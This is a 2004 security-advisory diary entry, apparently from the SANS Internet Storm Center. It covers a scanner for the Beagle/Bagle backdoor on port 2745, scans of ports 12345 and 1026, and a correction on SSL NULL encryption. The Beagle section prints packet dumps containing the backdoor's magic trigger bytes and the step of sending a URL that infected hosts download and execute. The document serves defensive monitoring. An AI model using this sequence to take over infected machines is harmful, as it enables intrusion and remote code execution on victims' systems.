Beagle Exploit, SSL NULL encryption (update), port 12345 and 1026

Published: 2004-03-29
Last Updated: 2004-03-30 02:36:20 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Beagle Virus Exploit

====================


Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745
(TCP). We do monitor increased scanning activity
for this port. Today, a reader submitted a tool which is
used to scan for Beagle infected systems. If the tool finds
port 2745 open, it will send the 'magic string' to open the
backdoor. Next, a URL is send to the system. The Bagle infected system
will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S
2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................
0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@...........
18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S
3650381978:3650381978(0) ack 2963418755 win 5840 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9....
0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h.....
0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'...........
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........

2. Send "exploit buffer"

18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

3. 'reply' from infected host (just 'CR' in this case)


18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........

4. send URL for download

18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http

Mailbag: Port 12345 scans

=========================


a user submitted logs showing large numbers of scans against
port 12345 (TCP). This port is commonly associated with the trojan
'Netbus' and other malware. The log did not indicate a new tool
but rather appears to be a number of sequential connect scans.

Ports in focus: 1026

====================


scans for port 1026 appear to increase again over the last
couple weeks. According to some reports, this is due to popup
spam, which now relies more on compromised systems as origin.

http://isc.sans.org/port_details.html?port=1026

In the past, only a small number of sources originated this
traffic.

SSL "NULL" Encryption (Errata)

==============================


An earlier diary ( http://isc.sans.org/diary.html?date=04-03-04 )
quoted Dr. Neal Krawetz, from Secure Science Corporation as saying
that "One of the SSL encoding methods is "plain text". Most SSL servers
have this disabled by default, but most browsers support it. When plain
text is used, no central certificate authority is consulted and the user
never sees a message asking if a certificate should be accepted (because
"plain text" doesn't use certificates). Keeping that in mind, the little
lock icon may not even indicate an encrypted channel. The little lock
only indicates an SSL connection"

Prompted by reader feedback, we did our own experiments, limiting an
Apache 1.3 server to 'NULL' encryption. We were not able to reproduce
this issue with any recent browser.

Mozilla, in default configuration, will popup an error dialog stating
that no common cipher could be found. If the 'null'/'plain text'
encryption is specifically enabled, the page will load, but the
certificate will still be validated and any errors will be communicated
to the user

Microsoft Internet Explorer will show a generic error page. It does
not appear to be possible in MSIE 6 to enable 'NULL' encryption.

---------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org


Keywords:
0 comment(s)

Comments


Diary Archives